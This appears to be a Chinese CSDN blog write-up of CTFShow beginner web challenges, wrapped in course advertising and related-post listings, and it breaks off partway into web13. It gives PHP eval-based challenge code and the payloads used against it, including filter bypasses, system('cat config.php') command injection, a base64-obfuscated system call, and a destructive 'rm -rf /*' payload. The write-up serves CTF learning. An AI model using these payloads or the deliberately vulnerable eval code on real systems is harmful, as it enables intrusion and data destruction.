2024年最新CTFShow“萌心区”WP(下)_ctfshow_萌新web18(1),2024年最新真是恍然大悟啊

于 2024-05-11 10:02:59 发布
阅读量293 收藏 8
点赞数 3
分类专栏: 程序员 文章标签: 网络安全 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264491/article/details/138703076
版权

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

		* [web5](#web5_27)
		* [web6](#web6_31)
		* [web7](#web7_34)
		* [web8](#web8_38)
		* [web9](#web9_69)
		* [web10](#web10_90)
		* [web11](#web11_122)
		* [web12](#web12_144)
		* [web13](#web13_166)
		* [web14](#web14_190)
		* [web15](#web15_213)
		* [web16](#web16_235)
		* [web17](#web17_258)
		* [web18-24](#web1824_283)

CTFShow 平台:https://ctf.show/

前言

刷题记录这是“萌心区(下)篇”

web1

在这里插入图片描述
简单分析一下 需要要用get方式上传id ,id大于999的时候会报错,有注意到下面的:flag in id = 1000,传入id = 1000 才能获得flag

看到函数intval 所以我们需要进行绕过 ?id=2 or id=1000

intval函数是获取变量的整型值,当它获取的变量不能被转换时返回0; 如果字符串其中有数字,则返回数字; 如果开头无法被转换,则返回0

在这里插入图片描述
在这里插入图片描述

web2

在这里插入图片描述
发现和web1 一样???? 使用一样的方法 /?id=100*10 可能是加了一些过滤规则吧。
在这里插入图片描述

web3

在这里插入图片描述
这回过滤了16进制 还是使用之前的方法发现还是可以执行。
在这里插入图片描述

web4

在这里插入图片描述
这次又增多了过滤 可以尝试 二次取反绕过 ?id=~~1000
在这里插入图片描述

web5

在这里插入图片描述
这回有增加了 新的过滤规则 增加了单双引号过滤 继续使用 二次取反绕过 ?id=~~1000**
在这里插入图片描述

web6

在这里插入图片描述
继续使用老方法 ?id=~~1000在这里插入图片描述

web7

在这里插入图片描述
这里新增了一个过滤 仔细看这里~也不行了 尝试一下二进制 ?id=0b1111101000
在这里插入图片描述

web8
<html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件,key flag 也在里面定义
include("config.php");
# 判断get提交的参数id是否存在
if(isset($\_GET['flag'])){
        if(isset($\_GET['flag'])){
                $f = $\_GET['flag'];
                if($key===$f){
                        echo $flag;
                }
        }
}else{
    highlight_file(__FILE__);
}

?>
</body>
</html>

根据提示 阿呆区了埃塞尔比亚(这么哪里???) 感觉是要删库跑路了; 所以payload 为:?flag=rm -rf /*
在这里插入图片描述

web9
<?php
# flag in config.php
include("config.php");
if(isset($\_GET['c'])){
        $c = $\_GET['c'];
        if(preg_match("/system|exec|highlight/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

FLAGconfig.php中 如果执行了if 里面得参数 就会显示FLAG 直接构造Payload:?c=system('cat config.php'); 然后F12 查看
在这里插入图片描述
在这里插入图片描述

web10
<?php
# flag in config.php
include("config.php");
if(isset($\_GET['c'])){
        $c = $\_GET['c'];
        if(!preg_match("/system|exec|highlight/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

这里做了过滤前面有个感叹号所以用上面得方法访问得话就 没有FLAG 需要从新构造Payload :?c=passthru('cat config.php'); F12查看
在这里插入图片描述

常见的命令执行函数:
system()
passthru()
exec()
shell\_exec()
popen()
proc\_open()
pcntl\_exec()

在这里插入图片描述
在这里插入图片描述

web11
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg\_match("/system|exec|highlight|cat/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight\_file(__FILE__);
}
?>

注意这里 对cat 命令进行了过滤 所以刚刚那两种方法都不行了,但是linux当中还有很多显示文本的命令。

这里可以参考:https://blog.csdn.net/qq_41274349/article/details/123707765
在这里插入图片描述

web12
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg\_match("/system|exec|highlight|cat|\.|php|config/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight\_file(__FILE__);
}
?>

这里新增得过滤规则是 phpconfig 可以base64编码绕过
构造payload:?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);,得到flag 然后F12 查看。
在这里插入图片描述
在这里插入图片描述

web13
<?php


## 学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center)





**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84264491
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-萌新(持续更新)
i_kei的博客
01-10 1万+
萌新认证 加入qq群:372619038 进群喊:萌新萌新_密码1 密文: 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 首先16进制转字符 发现一串base64编码的字符串,解密后得到栅栏加密的字符串 base64加密解密 栅栏解密后得到flag 萌新_密码2 出题人已累,随便敲了几下键盘。。。 rdcvbg 2qase3 6tgh
wordpress主题软件商城iDowns_V1.8.3最新
06-30
演示网址可以查看www.u9seo.com,软件包含下载插件,seo插件,登陆插件,支付插件等。更多功能自行下载研究
ctfshow-萌新
qq_43618536的博客
07-14 3816
ctfshow-萌新
CTFshow_萌新(杂项)
果粒程
12-18 694
CTFshow_萌新(杂项)
CTFshow_萌新(隐写)
果粒程
12-16 494
CTFshow_萌新(隐写)
ctfshow 萌新入门1
m0_73809176的博客
12-06 374
ctfshow 入门1
WordPress主题:Houzez-v3.1.0 知名房地产模板主题 2024最新
最新发布
04-25
Houzez v3.1.0是其2024最新版本,虽然非中文版,但对于熟悉英文的用户来说,安装和使用并不复杂。 ### 主题特点 1. **响应式设计**:Houzez主题采用响应式布局,确保无论在台式机、平板还是移动设备上,都能...
WP1-ctfshow
02-24
1
在WordPress中使用wp_count_posts函数来统计文章数量
10-23
`wp_count_posts()`函数就是用于解决这一问题的关键工具。它是一个内置的WordPress函数,能够帮助开发者轻松获取不同状态的文章和页面的计数。 `wp_count_posts()`函数的主要作用是返回一个对象,该对象包含了所有...
WP7_Barcode_Library.DLL-V1.3-Beta-Release.zip_ZXing _ZXing wp7_b
09-14
总的来说,WP7 Barcode Library V1.3 Beta Release是ZXing在Silverlight环境下的强大实现,为WP7开发者提供了便捷的条码处理工具,通过示例代码和文档,开发者能够快速地将条码功能集成到自己的应用中,提升用户体验...
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
afrog是一款性能卓越、快速稳定,PoC可定制化的漏洞扫描工具-A tool for finding vulnerab
03-01
afrog 是一款性能卓越、快速稳定、PoC 可定制化的漏洞扫描工具 - A tool for finding vulnerabilities
CTFshow_萌新--密码篇
weixin_45908624的博客
02-02 1337
ctfshow_萌新 密码篇
ctfshow3(萌新题目)
lovechinasomuch的博客
04-20 161
加减乘除除了加都试一遍 也可以 观看题解 有个大佬师傅 写了个 payload id= ~~1000,测试发现 ~~1000也可以直接得到flag。题目给出限制查询id范围小于一千,flagid为1000,并限制查询id数为1,可使用id=-1通过范围筛查,再用or id=1000查询出flag,构造url为。id=~~1000得到flag 可利用二进制绕过 用 id=0b001111101000绕过得到flag。打开题目又加了一些条件 用上个题目一个大佬的 id=~~1000可以得到flag。
CTFshow_萌新解题
ymx520haha的博客
04-24 1371
得到字母,但不是flag,看到作者名字是培根,想到了培根密码,将A替换m,B替换d,AABBABABAAABBBABABBAAAAAAABBABAABBA得到,进行解密得到guowang,改为大写提交flag成功。下载完发现是一个音频文件,用au打开,发现一段长短波,考虑为摩斯(-- ..- --.. .. -.- .. ... --. ----- ----- -..)看代码,发现存在命令执行漏洞,尝试构造得到flag,使用system(“cat config,php”),f12看源码得到flag。
ctfshow 做题 萌新 模块(1)
Goodric的博客
08-07 2139
ctfshow 做题 萌新 模块(1) —— 萌新认证 加 qq 群发“萌新码”得到萌新快乐码。 —— —— 萌新_密码1 可以猜测出,显示的是一串 16 进制码。 把 16 进制转换为字符串,得到另一串编码: S1lkZjBhM2ViZDVjNGRjMTYwLUV7ZmI2M2VlMDI5OGI4ZjRkOH0= 可以看出是 base64 编码。 base64 解码得到一个 flag ,但是提交是错误的,题目也提示了格式为 KEY{ 把得到的字符串再进行栅栏解密,得到 flag 。 —— —
设置上传文件的大小
fandoudou123的专栏
03-11 3024
* 单个文件大小限制     > sfu.setFileSizeMax(100*1024):限制单个文件大小为100KB     > 上面的方法调用,必须在解析开始之前调用!     > 如果上传的文件超出限制,在parseRequest()方法执行时,会抛出异常!FileUploadBase.FileSizeLimitExceededException   * 整个请求所有数据大小限制
POC检测工具-afrog(三)
siu~
07-28 3122
afrog 是一款快速、稳定的高性能漏洞扫描器。支持用户自定义PoC,内置CVE、CNVD、默认密码、信息泄露、指纹识别、越权访问、任意文件读取、命令执行等多种类型。通过afrog,网络安全专业人员可以快速验证和修复漏洞,这有助于增强他们的安全防御能力。
ctfshow-__萌新隐写
09-14
根据引用中提到的内容,CTFShow "萌心区"WP详解(上)涉及了一些关于萌新认证的内容,其中包括了密码、隐写和杂项等方面的题目。而引用中提到,下载的文件是一个word文件,里面包含了一张图,并且提示说找到了FLAG。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值